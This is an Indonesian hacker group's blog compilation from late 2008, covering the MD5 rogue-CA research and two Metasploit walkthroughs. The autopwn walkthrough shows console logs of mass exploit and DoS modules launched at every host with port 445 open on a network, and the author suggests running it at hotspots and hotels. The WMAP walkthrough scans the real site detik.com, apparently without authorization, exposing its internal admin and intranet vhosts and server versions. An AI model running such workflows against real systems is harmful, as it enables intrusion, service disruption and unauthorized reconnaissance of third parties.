Kecoak Elektronik Indonesia

So, here we are, di penghujung tahun 2008. Kami dari kecoak elektronik mengucapkan terima kasih karena cukup banyak yang membaca dan mengikuti isi blog ini disepanjang tahun 2008, dan kami berharap segala hal yang disampaikan melalui media blog ini dapat bermanfaat bagi rekan-rekan semua.

Di tahun 2008 ini juga k-elektronik telah mengeluarkan TokET yang merupakan kumpulan artikel dari para staff k-elektronik, mendapatkan satu tambahan staff namun juga kehilangan satu orang staff yang telah cukup lama membangun k-elektronik.  Tahun ini juga K-Elektronik secara resmi ikut berpartisipasi aktif dalam salah satu acara konferensi security yang sifatnya non-profit dengan tujuan membagi secara langsung kepada masyarakat IT Indonesia mengenai informasi seputar Teknologi Internet Security.

Semoga saja ditahun 2009 k-elektronik dapat lebih aktif lagi melakukan berbagai hal seputar Teknologi Internet Security dan masih tetap teguh serta mampu membagi informasi tersebut kepada seluruh masyarakat Indonesia.

Least, but not last, happy new year. And still…long live Undergrond!

— Staff, penghujung tahun 2008

Well, berikut ini rincian (hampir?) lengkap mengenai presentasi team alexander sotirov yang menjadi sorotan komunitas security akibat judulnya di event CCC kemarin, “Making the theoretical possible. Attacking a critical piece of Internet infrastructure.”. In fact, judul yang sebenarnya lebih relevan adalah “MD5 considered harmful today: creating a rogue CA certificate” .

Di milis DailyDave sehari sebelumnya beberapa orang memprediksi apa kira-kira isi presentasi tersebut, dan sebagian besar berpendapat vulnerable pada routing protocol. Sebenarnya saya pribadi cukup kecewa karena inti dari permasalahan yang akan dibahas tidak seperti yang dibayangkan sebelumnya, bukan bermaksud meremehkan hole MD5 ini, namun efek yang dihasilkan tidaklah se-efektif hole sebelum-sebelumnya seperti bailiwicked dns (yang menyerang standard protocol). Effort yang dibutuhkan oleh hole ini juga sangat besar, tidak se-efisien serangan terhadap bailiwicked. Dan infrastruktur yang diserang pun membutuhkan bantuan dari vulnerable yang lain (seperti untuk me-redirect request user).

MD5 collision muncul sekitar tahun 2004, dan cukup mencengangkan karena kita bisa membuat dua binary yang menghasilkan fungsi berbeda namun memiliki MD5 signature yang persis sama. Apa yang dilakukan oleh team Alexander Sotirov adalah mengimplementasikan jenis serangan ini terhadap CA (Certificate Authority) dimana CA tersebut mendistribusikan signature menggunakan MD5, jenis serangan memanfaatkan algoritma yang merupakan implementasi analisis dari bidang akademis dengan security researcher dan memanfaatkan kemampuan cluster hardware (PS3) sebagai alat perhitungan matematis. Memang secara praktikal serangan ini tidak dapat dilakukan begitu saja oleh sembarang orang karena resource-resource yang dibutuhkan sangat besar (walaupun kita bisa menghasilkan algoritam yang lebih efisien, tetap saja membutuhkan resource hardware yang besar), namun informasi ini tetap penting karena:

• Aplikasi yang memanfaatkan MD5 masih cukup banyak, dan apabila suatu pihak memang berniat menyerang suatu target penting (mis: aplikasi gov) dan ada salah satu aplikasi mereka yang menggunakan MD5 maka metode ini dapat digunakan.
• Resource bukanlah masalah bagi perusahaan, government, organisasi kriminal, underground dan para botnetnya, dsb. Sehingga serangan ini tetap memungkinkan bagi pihak-pihak yang serius ingin mendapatkan akses ke suatu sektor penting dan uang bukan masalah bagi mereka.
• Public disclosure suatu metode tidak dapat dianggap remeh begitu saja, karena public disclosure mengakibatkan riset tersebut menjadi informasi dasar bagi seluruh orang di dunia. Dan efeknya adalah beragam hacker, researcher, akademia akan mencoba cara-cara unik lainnya sehingga bisa jadi di saat-saat mendatang akan didapatkan collision MD5 tanpa menggunakan komputasi super-power, namun dengan beberap ‘highly developed trick” tersendiri (terutama untuk menangani kesulitan birthday attack).
• Google berhasil membuat komputasi sulit dengan memanfaatkan cluster PC biasa yang telah dimodifikasi, bukan tidak mungkin dengan berbagai hardware hacking bisa didapatkan kemampuan yang sama dalam hal komputasi. Dan sesuai dengan perkembangan jaman dimana kemampuan hardware semakin berkembang, tahun 2008 sistem cluster dari game console bisa menyamai kemampuan super-power komputer. Tahun-tahun mendatang kreativitas hardware ini akan semakin berkembang lebih baik lagi dan pembuatan algoritma juga akan ikut berkembang.

Saya sendiri setuju dengan pendapat Thomas Ptacek dari Matasano mengenai serangan ini (taken from dailydave mailing list):

* The research team had access not only to a cluster of PS3s but to a
specially optimized MD5 collision-finding implementation, which they
had because Lenstra’s team has been playing with a PS3 cluster for
awhile.

* The research team had access to a currently-unpublished optimization
to (presumably the birthday-bits search part of) the collision-finding
algorithm,

* The attack could be made impractical by randomizing the serial
numbers for all future certs issued by RapidSSL (and, presumably, by
banning MD5).

Saya tetap berpendapat Bailiwicked DNS adalah bugs (public-disclosure) paling asyik tahun 2008 ini karena sifatnya yang simple namum benar-benar mempengaruhi infrastruktur internet dan masyarakat secara luas, sementara Pho3n1x tetap berpendapat bahwa SNMP V3 Authentication Vulnerability merupakan bugs terpilih tahun ini. So, gimana dengan kalian?!

Event CCC sudah hampir berakhir, dan seperti biasa banyak sekali materi-materi menarik yang biasanya menjadi fenomena tersendiri. Sebagaimana sejarahnya, event-event CCC sering menampilkan hal-hal unik seputar teknologi dan juga beragam informasi berbahaya lainnya seputar dunia internet security. Informasi dari event CCC tahun ini bisa dilihat pada link ini, dan materi-materinya dapat diakses melalui The Pirate Bay.

Btw, rasanya informasi dari orang ini akan menutup rentetan bugs-bugs yang mencari-cari mengundang perhatian media massa di tahun 2008.

Klo kata anak-anak underground dan para blackhat, tehnik auto-exploitation metasploit termasuk lame. Biar bagaimanapun juga metasploit merupakan tools yang didevelop untuk aktivitas penetration testing. Semua dokumentasinya pun selalu membatasi agar proses penetration testing dengan menggunakan metasploit dilakukan secara legal. Walaupun, banyak yang menggunakan isi metasploit untuk hal-hal yang jauh lebih mengerikan lagi, salah satunya adalah worm sasser beberapa tahun lalu yang menggunakan payload dari metasploit (port 4444) untuk exploitasi service lsass Microsoft Windows.

Implementasi autopwn metasploit cukup mudah dilakukan, daripada kita melakukan nmap secara manual dan mencoba satu per satu dari msfconsole untuk suatu exploit, dengan memanfaatkan AutoPwn metasploit proses ini bisa dilakukan secara otomatis. Pada pemanfaatan lebih lanjut kita bisa mengembangkan proses scanning yang dilakukan hingga bersifat spesifik (servis tertentu, sistem operasi tertentu, dll), namun untuk contoh kali ini dilakukan secara sederhana menggunakan target apapun yang terbuka pada port 445 (hayooo, service apa yang membuka port 445?).

msf > version
Framework: 3.3-dev.5962
Console  : 3.3-dev.6039
msf > load db_postgres
[*] Successfully loaded plugin: db_postgres

msf > db_create autopwn.db
ERROR:  table "hosts" does not exist
NOTICE:  CREATE TABLE will create implicit sequence "hosts_id_seq" for serial column "hosts.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "hosts_pkey" for table "hosts"
NOTICE:  CREATE TABLE / UNIQUE will create implicit index "hosts_address_key" for table "hosts"
ERROR:  table "services" does not exist
NOTICE:  CREATE TABLE will create implicit sequence "services_id_seq" for serial column "services.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "services_pkey" for table "services"
ERROR:  table "vulns" does not exist
NOTICE:  CREATE TABLE will create implicit sequence "vulns_id_seq" for serial column "vulns.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "vulns_pkey" for table "vulns"
ERROR:  table "refs" does not exist
NOTICE:  CREATE TABLE will create implicit sequence "refs_id_seq" for serial column "refs.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "refs_pkey" for table "refs"
ERROR:  table "vulns_refs" does not exist
ERROR:  table "notes" does not exist
NOTICE:  CREATE TABLE will create implicit sequence "notes_id_seq" for serial column "notes.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "notes_pkey" for table "notes"
[*] Database creation complete (check for errors)

msf > db_connect autopwn.db

msf > db_nmap -p 445 10.10.13.1/24
[*] exec: "/usr/local/bin/nmap" "-p" "445" "10.10.13.1/24" "-oX" "/var/folders/ET/ETjeIh81FAOxuPsmYvtgI++++TI/-Tmp-/dbnmap.478.0"
NMAP:
NMAP: Starting Nmap 4.68 ( http://nmap.org ) at 2008-12-23 16:05 EAT
NMAP: Interesting ports on 10.10.13.1:
NMAP: PORT    STATE  SERVICE
NMAP: 445/tcp closed microsoft-ds
NMAP:
NMAP: Interesting ports on 10.10.13.7:
NMAP: PORT    STATE SERVICE
NMAP: 445/tcp open  microsoft-ds
...

...

NMAP:
NMAP: Nmap done: 256 IP addresses (28 hosts up) scanned in 3.332 seconds
msf > db_services
[*] Time: Tue Dec 23 16:05:40 +0300 2008 Service: host=10.10.13.7 port=445 proto=tcp state=up name=microsoft-ds
[*] Time: Tue Dec 23 16:05:40 +0300 2008 Service: host=10.10.13.14 port=445 proto=tcp state=up name=microsoft-ds
[*] Time: Tue Dec 23 16:05:40 +0300 2008 Service: host=10.10.13.15 port=445 proto=tcp state=up name=microsoft-ds
[*] Time: Tue Dec 23 16:05:40 +0300 2008 Service: host=10.10.13.18 port=445 proto=tcp state=up name=microsoft-ds
[*] Time: Tue Dec 23 16:05:40 +0300 2008 Service: host=10.10.13.21 port=445 proto=tcp state=up name=microsoft-ds
[*] Time: Tue Dec 23 16:05:40 +0300 2008 Service: host=10.10.13.22 port=445 proto=tcp state=up name=microsoft-ds
[*] Time: Tue Dec 23 16:05:40 +0300 2008 Service: host=10.10.13.23 port=445 proto=tcp state=up name=microsoft-ds
...

...

msf > db_autopwn -p -t
[*] Analysis completed in 6.44996190071106 seconds (0 vulns / 0 refs)
[*] Matched exploit/osx/samba/lsa_transnames_heap against 10.10.13.7:445...
[*] Matched exploit/windows/brightstor/etrust_itm_alert against 10.10.13.34:445...
[*] Matched exploit/windows/smb/ms04_011_lsass against 10.10.13.37:445...
[*] Matched exploit/windows/brightstor/etrust_itm_alert against 10.10.13.41:445...
[*] Matched auxiliary/dos/windows/smb/ms06_063_trans against 10.10.13.14:445...
[*] Matched auxiliary/dos/samba/lsa_addprivs_heap against 10.10.13.29:445...
[*] Matched auxiliary/admin/db2/db2rcmd against 10.10.13.50:445...
[*] Matched exploit/windows/smb/ms06_040_netapi against 10.10.13.34:445...
[*] Matched exploit/windows/smb/ms03_049_netapi against 10.10.13.50:445...
[*] Matched exploit/solaris/samba/lsa_transnames_heap against 10.10.13.25:445...

...

...

msf > db_autopwn -p -t -e
[*] Analysis completed in 6.14483499526978 seconds (0 vulns / 0 refs)
[*] Matched exploit/osx/samba/lsa_transnames_heap against 10.10.13.7:445...
[*] (1/624): Launching exploit/osx/samba/lsa_transnames_heap against 10.10.13.7:445...
[*] Matched exploit/windows/brightstor/etrust_itm_alert against 10.10.13.34:445...
[*] (2/624): Launching exploit/windows/brightstor/etrust_itm_alert against 10.10.13.34:445...
[*] Matched exploit/windows/smb/ms04_011_lsass against 10.10.13.37:445...
[*] (3/624): Launching exploit/windows/smb/ms04_011_lsass against 10.10.13.37:445...

[*] Started bind handler
[*] Matched exploit/windows/brightstor/etrust_itm_alert against 10.10.13.41:445...
[*] (4/624): Launching exploit/windows/brightstor/etrust_itm_alert against 10.10.13.41:445...
[*] Started bind handler

[*] Matched auxiliary/dos/windows/smb/ms06_063_trans against 10.10.13.14:445...
...

...

Konsepnya sederhana, Metasploit diatas memanfaatkan postgre sebagai database untuk menyimpan data. Setelah kita membuat database “autopwn.db” akan terbentuk database postgre, selanjutnya kita tinggal connect ke database tersebut. Setelah connect maka akan muncul beberapa command tambahan yang dapat digunakan untuk berinteraksi dengan database, salah satnya adalah “db_autopwn”. Berbeda dengan wmap seperti yang ditulis sebelumnya, db_autopwn merupakan bagian dari plugin postgre sehingga tidak perlu di load secara terpisah, istilah kerennya db_autopwn merupakan backend dari database postgre, dan dapat dilihat menggunakan command “help” pada bagian “Database Backend Command”.

Sebagaimana yang tertulis pada blog metapsloit mengenai autopwn, proses scanning dapat dilakukan dengan 3 cara. Yang pertama adalah import NBE file hasil scanning dengan nessus, yang kedua import XML file hasil scanning nmap, atau langsung menggunakan “db_nmap” untuk proses scanning dengan nmap yang hasilnya akan langsung disimpan kedalam database postgre tersebut. Pada contoh diatas, saya menggunakan feature scanning dari nmap secara langsung dengan target port 445.

db_autopwn dapat melakukan analisis secara otomatis berdasarkan isi database postgre, apakah berdasarkan port target, atau berdasarkan referensi hole, dsb. Contoh diatas menggunakan target port 445, jadi apabila dalam satu network ada terdeteksi port 445 open maka dengan bodoh polosnya metasploit akan menganggap port tersebut berpotensi memiliki hole yang selanjutnya akan dimasukan dalam proses bruteforce terhadap semua exploit yang menyerang port 445.

Tentu saja contoh diatas sangat naif jika digunakan terhadap target-target berkelas (mis: server farm) karena biasanya sysadmin tersayang akan menggunakan port non-default, namun tidak menutup kemungkinan dengan variasi mekanisme private scanning dan melakukan import ke database postgre yang telah tersedia (jangan lupa, metasploit dapat di-customize dengan beberapa script ruby) maka proses autopwn bisa dilakukan dengan lebih tepat. Yah, paling tidak jika kita datang ke suatu lokasi (hotspot, hotel, security conference) ataupun hanya sekedar pamer ke customer saat melakukan pentesting suatu perusahaan, db_autopwn bisa melakukan tugasnya dengan cepat dan efisien. Sehingga dengan cepat kita bisa mengatakan:

Pen-testhor : “tuh pak, saya sudah menemukan 11 komputer windows di perusahaan anda vulnerable, belum masuk ke server nya ini nih…”

Bos-ok: “great work, nanti $2000 langsung saya transfer setelah menerima report dari anda”

Well, what a bored day here…

Mungkin masih ada yang belum tahu bahwa metasploit saat ini mendukung cukup banyak feature, salah satunya adalah wmap. WMAP merupakan web application framework yang digunakan untuk proses scanning suatu website dengan memanfaatkan metasploit framework. WMAP sendiri masih terbilang baru sehingga masih banyak hal-hal yang belum ditambahkan, proses scanning pun masih dilakukan dengan cara sederhana namun konsepnya cukup baik sehingga kita dapat ikut melakukan kustomisasi terhadap modul-moudul yang akan digunakan.

Dokumentasi mengenai WMAP dapat ditemukan pada paket Metasploit, atau bisa dilihat langsung secara online disini. Dan seperti biasa, kita akan mulai pembahasan dari konsep hingga implementasi.

Bagi kalian yang terbiasa melakukan audit ataupun scanning terhadap suatu aplikasi web pasti sudah terbiasa dengan istilah spider. Web scanner umumnya memiliki kemampuan untuk mengumpulkan informasi sebanyak-banyaknya dari target melalui seluruh link yang ditemukan mulai dari halaman index hingga halaman-halaman terdalam lainnya. Web scanner tersebut akan melakukan audit terhadap link-link yang ditemukan dan dicocokan hasilnya dengan informasi vulnerability dalam database tools tersebut. WMAP pada metasploit bekerja dengan metode yang mirip namun memanfaatkan aplikasi-aplikasi opensource.

WMAP merupakan salah satu plugin (yup, salah satu, masih ada beberapa plugin lainnya) metasploit yang dapat di load pada msfconsole dimana melalui msfconsole tersebut user dapat berinteraksi dengan metasploit framework. Berikut ini konsep WMAP pada metasploit:

1. RatProxy

Metasploit memanfaatkan RatProxy sebagai proxy yang akan menangkap seluruh data request-response antara web client dengan web server. Informasi tersebut akan dimasukan ke suatu database (sqlite3) untuk kemudian digunakan oleh modul-modul WMAP. RatProxy sendiri merupakan hasil karya hacker Michal Zalewski yang merupakan opensource tools untuk audit web application. RatProxy tidak memiliki dukungan terhadap penyimpanan data kedalam bentuk database, oleh karena itu sebelum dapat digunakan oleh WMAP maka RatProxy harus di-patch terlebih dahulu. Patch bisa didapatkan dari bundle metasploit: external/ratproxy/ratproxy_wmap.diff

2. SQLite3

SQLite merupakan produk database yang diklaim small, fast, reliable. SQLite umumnya digunakan oleh aplikasi-aplikasi yang membutuhkan database sebagai tempat penyimpanan dan pemrosesan data yang sederhana. Contoh penggunaannya adalah pada iPhone dimana sqlite digunakan untuk menyimpan data SMS. Metasploit sendiri memiliki driver yang dapat berkomunikasi dengan 3 produk database, MySQL, PostgreSQL, dan SQlite3. Implementasi WMAP memanfaatkan SQLite3.

3. WMAP

WMAP merupakan plugin metasploit untuk web application framework audit. Saat tulisan ini dibuat versi stable metasploit adalah 3.2, dan modul-modul yang dapat digunakan oleh WMAP antara lain: WMAPScanServer, WMAPScanDir, WMAPScanUniqueQuery, dll.

Jika kalian menggunakan Backtrack 3 final, maka support terhadap metasploit sudah sangat baik. Requirement yang dibutuhkan oleh metasploit telah terpenuhi dan plugin-pluginnya dapat di-load dengan mudah. Namun beberapa sistem operasi lain umumnya membutuhkan beragam metode sebelum dapat memanfaatkan feature-feature pada metasploit framework. Untuk plugin WMAP ini, seperti yang telah disebutkan diatas, dibutuhkan RatProxy dan SQlite3 berjalan dengan baik sebelum me-load WMAP. Pada contoh dibawah ini saya menggunakan sistem operasi OS X yang membutuhkan beberapa data tambahan untuk memuaskan persayaratan yang dibutuhkan oleh WMAP, diantaranya yang terpenting dibutuhkan flare khusus (bukan bawaan dari RatProxy) yang kompatibel dengan MacOSX. Flare merupakan tools yang digunakan untuk proses decompiler action script flash.

(1). Buat database wmap_test.db melalui plugin database metasploit

msf > db_create /Users/staff/wmap_test.db
[*] Creating a new database instance...
[*] Successfully connected to the database
[*] File: /Users/staff/wmap_test.db

(2). Bagi kalian yang memiliki rasa penasaran tinggi tentu ingin melihat seperti apa bentuk database yang dibuat oleh plugin database metasploit tersebut. Database yang telah dibuat dapat kita lihat schema-nya secara langsung menggunakan SQLite.

k-elektronik:~ staff$ sqlite3 wmap_test.db
SQLite version 3.4.0
Enter ".help" for instructions
sqlite> .tables
hosts       refs        requests    targets     vulns_refs
notes       reports     services    vulns
sqlite> .schema requests
CREATE TABLE requests (
'host' VARCHAR(20),
'port' INTEGER,
'ssl' INTEGER,
'meth' VARCHAR(20),
'path' BLOB,
'headers' BLOB,
'query' BLOB,
'body' BLOB,
'respcode' VARCHAR(5),
'resphead' BLOB,
'response' BLOB,
'created' TIMESTAMP
);

(3). Setelah urusan database selesai, maka selanjutnya menjalankan aplikasi RatProxy yang sebelumnya telah di-patch agar dapat menyimpan seluruh data request-response ke database wmap_test.db

k-elektronik:ratproxy staff$ ./ratproxy -v /Users/staff/ -b wmap_test.db -d detik.com -xtifkgmjscael2XCr
ratproxy version 1.51-beta by 
[*] Proxy configured successfully. Have fun, and please do not be evil.
WARNING: Disruptive tests enabled. use with care.
[+] Accepting connections on port 8080/tcp (any source)...

(4). RatProxy diatas menggunakan port default, yaitu 8080. Yang berarti pada mesin tersebut dibuka port 8080 dan akan bertindak sebagai proxy server. Sisanya adalah kita melakukan browsing secara manual ataupun menggunakan automatic tools dengan memanfaatkan port 8080 itu sebagai proxy server. Hasil dari browsing seluruhnya akan di log oleh RatProxy kedalam database wmap_test.db

(5). Sekali lagi, bagi yang penasaran apakah RatProxy benar-benar menyimpan hasilnya pada database yang telah kita buat sebelumnya, dapat memanfaatkan sqlite3.

sqlite> select host,meth,headers from requests;
202.158.66.94|GET|User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us
Accept-Encoding: gzip, deflate
Cookie: __utma=146380193.1809118446.1213005860.1213005860.1213005860.1
Connection: keep-alive
Proxy-Connection: keep-alive
Host: detik.com

202.158.66.94|GET|User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1
Referer: http://detik.com/
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
Cookie: __utma=146380193.1809118446.1213005860.1213005860.1213005860.1
Connection: keep-alive
Proxy-Connection: keep-alive
Host: detik.com

(6). Berikutnya kita akan melihat bagaimana wmap bekerja. Pada langkah pertama tadi kita telah membuat database wmap_test.db melalui msfconsole sekaligus connect ke database tersebut secara otomatis menggunakan plugin db_sqlite3. Maka selanjutnya yang dibutuhkan adalah load plugin wmap untuk kemudian membaca database wmap_test.db tersebut.

msf > load db_wmap
[*] =[ WMAP v0.3 - ET LoWNOISE
[*] Successfully loaded plugin: db_wmap
msf > wmap_targets -p
[*]    Id. Host                    Port    SSL
[*] Done.
msf > wmap_targets -r          <<< Ini salah satu langkah penting, sebelum print target, harus reload terlebih dahulu.
[*] Added. 202.158.66.94 80 0
[*] Added. 202.158.66.164 80 0
[*] Added. 202.158.66.86 80 0
[*] Added. 202.158.66.20 80 0
[*] Added. 202.158.66.190 80 0
[*] Added. 202.158.66.54 80 0
[*] Added. 202.158.66.24 80 0
[*] Added. 64.233.183.127 80 0
msf > wmap_targets -p  << target berikut ini hasil browsing via web browser ke situs detik.com
[*]    Id. Host                    Port    SSL
[*]    1. 202.158.66.94                          80
[*]    2. 202.158.66.164                         80
[*]    3. 202.158.66.86                          80
[*]    4. 202.158.66.20                          80
[*]    5. 202.158.66.190                         80
[*]    6. 202.158.66.54                          80
[*]    7. 202.158.66.24                          80
[*]    8. 64.233.183.127                         80
[*] Done.

msf > wmap_targets -s 1

msf > wmap_targets -p
[*]    Id. Host                    Port    SSL
[*] => 1. 202.158.66.94                          80
[*]    2. 202.158.66.164                         80
[*]    3. 202.158.66.86                          80
[*]    4. 202.158.66.20                          80
[*]    5. 202.158.66.190                         80
[*]    6. 202.158.66.54                          80
[*]    7. 202.158.66.24                          80
[*]    8. 64.233.183.127                         80
[*] Done.
msf > wmap_website
[*] Website structure
[*] 202.158.66.94:80 SSL:0
ROOT_TREE
+------favicon.ico
|    js
|    +------swfobject.js
|    +------openwin11.js
|    +------etc.js
|    +------expandbannerall.js.html
|    +------contentslider.js
|    +------tabcontent.js
|    +------jquery-1.2.6.min.js
[*] Done.
msf > wmap_targets -s 2
msf > wmap_website
[*] Website structure
[*] 202.158.66.164:80 SSL:0
ROOT_TREE
|    images
|    +------telkomsel-280x175.gif
|    +------banner-detik-rev-final.gif
|    +------1x1.gif
|    +------promocontinue_4.swf
|    delivery
|    +------spcjs.php
|    +------lg.php
|    +------spc.php
|    +------fl.js
[*] Done.
msf > wmap_targets -s 3
msf > wmap_website
[*] Website structure
[*] 202.158.66.86:80 SSL:0
ROOT_TREE
|    css
|    +------allslider.css
|    +------detikcom.css
|    +------pollingsmsorange02.css
|    +------alltabs.css
|    images
|    |    content
|    |    |    blog
|    |    |    |    -
|    |    |    |    +------20081219172849_blog.jpg
|    |    |    |    +------20081219115448_blog.jpg
|    |    |    |    +------20081219134455_blog.jpg
|    |    |    2008
|    |    |    |    12
|    |    |    |    |    22
|    |    |    |    |    |    71
|    |    |    |    |    |    +------SpallettiAFP-cov.jpg
|    |    |    |    |    |    +------ranieri-cov.jpg
|    |    |    |    |    |    72
|    |    |    |    |    |    +------ArsenalPool-EddieKeogh200.jpg
|    |    |    |    |    |    73
|    |    |    |    |    |    +------vandersar-cover.jpg
|    |    |    |    |    |    75
|    |    |    |    |    |    +------Sevilla-Reuters200.jpg
|    |    |    |    |    |    +------BarcaDiegoTusonAFP-cov.jpg
|    |    |    |    |    |    10
|    |    |    |    |    |    +------wir-cover.jpg
|    |    |    |    |    21
|    |    |    |    |    |    648
|    |    |    |    |    |    +------toyota-depan.JPG
|    |    |    |    |    |    288
|    |    |    |    |    |    +------RumahDurian.jpg
|    |    |    |    |    |    157
|    |    |    |    |    |    +------coverpknu.jpg
|    |    |    |    |    |    +------coverateror.jpg
|    |    |    |    |    |    +------coverpolis.jpg
|    |    video
|    |    |    2008
|    |    |    |    12
|    |    |    |    +------081221483.png
|    image
|    +------iring808.gif
|    +------icn_jwb.gif
|    +------arrow_up.gif
|    +------ticketboxlogo.gif
|    +------logodetikcomfooter.gif
|    +------pollwpdetik.gif
|    +------spacer.gif
|    +------iconvideo.gif
|    +------logodetikcom.gif
|    +------Logo_25wht.gif
|    +------song_icon.gif
|    +------arrow_down.gif
|    +------tvwp.swf
|    +------iconphoto.gif
|    +------rssfeed_s.gif
|    +------panahforumwp.gif
|    +------bgregional6a.gif
|    +------bgticketbox.gif
|    +------bgdetikmap.gif
|    +------bgtapoff6a.gif
|    +------radioplayer.gif
|    +------bgpollsmsorange.gif
|    +------bgtapon6a.gif
|    +------pollingsmscenter.jpg
|    +------rss.gif
|    +------tanyasajalogo.gif
|    +------bgmenuatas.gif
|    +------tanya.gif
|    +------detikpublishinglogo.gif
|    +------bgmaplokasi.gif
|    +------bgcontent.gif
[*] Done.
msf > wmap_targets -s 4
msf > wmap_website
[*] Website structure
[*] 202.158.66.20:80 SSL:0
ROOT_TREE
|    content_image
|    |    2008
|    |    |    12
|    |    |    |    20
|    |    |    |    |    283
|    |    |    |    |    +------20081220-andini-k.jpg
|    |    |    |    |    471
|    |    |    |    |    +------wanita-k.jpg
[*] Done.
msf > wmap_targets -s 5
msf > wmap_website
[*] Website structure
[*] 202.158.66.190:80 SSL:0
ROOT_TREE
|    images
|    |    content
|    |    |    2008
|    |    |    |    12
|    |    |    |    |    18
|    |    |    |    |    |    238
|    |    |    |    |    |    +------bantuan-luar.jpg
[*] Done.
msf > wmap_targets -s 6
msf > wmap_website
[*] Website structure
[*] 202.158.66.54:80 SSL:0
ROOT_TREE
|    images
|    |    wp
|    |    +------Telkomsel-200x300.swf
|    |    +------alexa_200x300b.gif
|    |    +------BannerFLEXISPEEDY_300x250-01.swf
|    |    +------wp-detik-magicaccess2.swf
|    |    +------wp1-XLSolution-338x200.swf
|    |    +------StarTV-19-338x133.swf
|    |    +------StarTV-19-338x30.swf
|    |    +------BannerBudpar875x100-01.swf
|    |    +------Banner_Detik_Agustus_08.jpg
[*] Done.
msf > wmap_targets -s 7
msf > wmap_website
[*] Website structure
[*] 202.158.66.24:80 SSL:0
ROOT_TREE
|    static
|    |    detikcom1
|    |    +------toppariwaradetikcom.php
[*] Done.

msf > wmap_run -t
[*] Loaded auxiliary/scanner/http/version ...
[*] Loaded auxiliary/scanner/http/wmap_ssl_vhost ...
[*] Loaded auxiliary/scanner/http/wmap_vhost_scanner ...
[*] Loaded auxiliary/scanner/http/frontpage_login ...
[*] Loaded auxiliary/scanner/http/frontpage ...
[*] Loaded auxiliary/scanner/http/wmap_file_same_name_dir ...
[*] Loaded auxiliary/scanner/http/wmap_dir_scanner ...
[*] Loaded auxiliary/scanner/http/wmap_prev_dir_same_name_file ...
[*] Loaded auxiliary/scanner/http/wmap_backup_file ...
[*] Loaded auxiliary/scanner/http/wmap_dir_listing ...
[*] Loaded auxiliary/scanner/http/wmap_replace_ext ...
[*] Loaded auxiliary/scanner/http/writable ...
[*] Loaded auxiliary/scanner/http/wmap_files_dir ...
[*] Loaded auxiliary/scanner/http/wmap_brute_dirs ...
[*] Loaded auxiliary/scanner/http/wmap_blind_sql_query ...
[*] Analysis completed in 1.00374484062195 seconds.
[*] Done.

msf > wmap_targets -s 3
msf > wmap_targets -p
[*]    Id. Host                    Port    SSL
[*]    1. 202.158.66.94                          80
[*]    2. 202.158.66.164                         80
[*] => 3. 202.158.66.86                          80
[*]    4. 202.158.66.20                          80
[*]    5. 202.158.66.190                         80
[*]    6. 202.158.66.54                          80
[*]    7. 202.158.66.24                          80
[*]    8. 64.233.183.127                         80
[*] Done.

msf > setg VHOST www.detik.com
VHOST => www.detik.com
msf > setg DOMAIN detik.com
DOMAIN => detik.com
msf > setg EXT .php
EXT => .php

msf > wmap_run -e
[*] Launching auxiliary/scanner/http/wmap_vhost_scanner WMAP_SERVER against 202.158.66.86:80

[*] Sending request with random domain LtELt.detik.com
[*] Vhost found  admin.detik.com
[*] Vhost found  services.detik.com
[*] Vhost found  webmail.detik.com
[*] Vhost found  console.detik.com
[*] Vhost found  apps.detik.com
[*] Vhost found  mail.detik.com
[*] Vhost found  intranet.detik.com
[*] Vhost found  intra.detik.com
[*] Vhost found  corporate.detik.com
[*] Vhost found  www.detik.com
[*] Vhost found  web.detik.com
[*] Launching auxiliary/scanner/http/frontpage_login WMAP_SERVER against 202.158.66.86:80
[*] http://202.158.66.86:80/ may not support FrontPage Server Extensions
[*] Launching auxiliary/scanner/http/version WMAP_SERVER against 202.158.66.86:80
[*] 202.158.66.86 is running Apache/2.2.9 (Unix) DAV/2 PHP/5.1.6 ( Powered by PHP/5.1.6 )
[*] Launching auxiliary/scanner/http/frontpage WMAP_SERVER against 202.158.66.86:80
[*] http://202.158.66.86:80 is running Apache/2.2.4 (Unix) DAV/2 PHP/5.1.6
[*] FrontPage not found on http://202.158.66.86:80 [404 Not Found]
[*] Launching auxiliary/scanner/http/wmap_ssl_vhost WMAP_SERVER against 202.158.66.86:80
[*] Error: 202.158.66.86 unknown protocol
[*] Launching auxiliary/scanner/http/wmap_brute_dirs WMAP_DIR / against 202.158.66.86:80...
[*] Running..
[*] NOT Found http://202.158.66.86:/Aaa/  404
[*] NOT Found http://202.158.66.86:/Aab/  404
[*] NOT Found http://202.158.66.86:/Aac/  404
...

...

...

msf > wmap_reports -p
[*] Id. Created                Target (host,port,ssl)
19.  Mon Dec 22 00:29:25 +0300 2008    202.158.66.86,,0
18.  Mon Dec 22 00:29:19 +0300 2008    202.158.66.86,80,0
4.  Mon Dec 22 00:22:31 +0300 2008    202.158.66.86,80,0
1.  Mon Dec 22 00:00:21 +0300 2008    64.233.183.127,80,0
[*] Done.
msf > wmap_reports -s 19
WMAP REPORT: 202.158.66.86,,0 Metasploit WMAP Report [Mon Dec 22 00:29:25 +0300 2008]
VHOST NAME: admin.detik.com Vhost admin.detik.com found. [Mon Dec 22 00:29:25 +0300 2008]
VHOST NAME: services.detik.com Vhost services.detik.com found. [Mon Dec 22 00:29:27 +0300 2008]
VHOST NAME: webmail.detik.com Vhost webmail.detik.com found. [Mon Dec 22 00:29:31 +0300 2008]
VHOST NAME: console.detik.com Vhost console.detik.com found. [Mon Dec 22 00:29:32 +0300 2008]
VHOST NAME: apps.detik.com Vhost apps.detik.com found. [Mon Dec 22 00:29:34 +0300 2008]
VHOST NAME: mail.detik.com Vhost mail.detik.com found. [Mon Dec 22 00:29:38 +0300 2008]
VHOST NAME: intranet.detik.com Vhost intranet.detik.com found. [Mon Dec 22 00:29:39 +0300 2008]
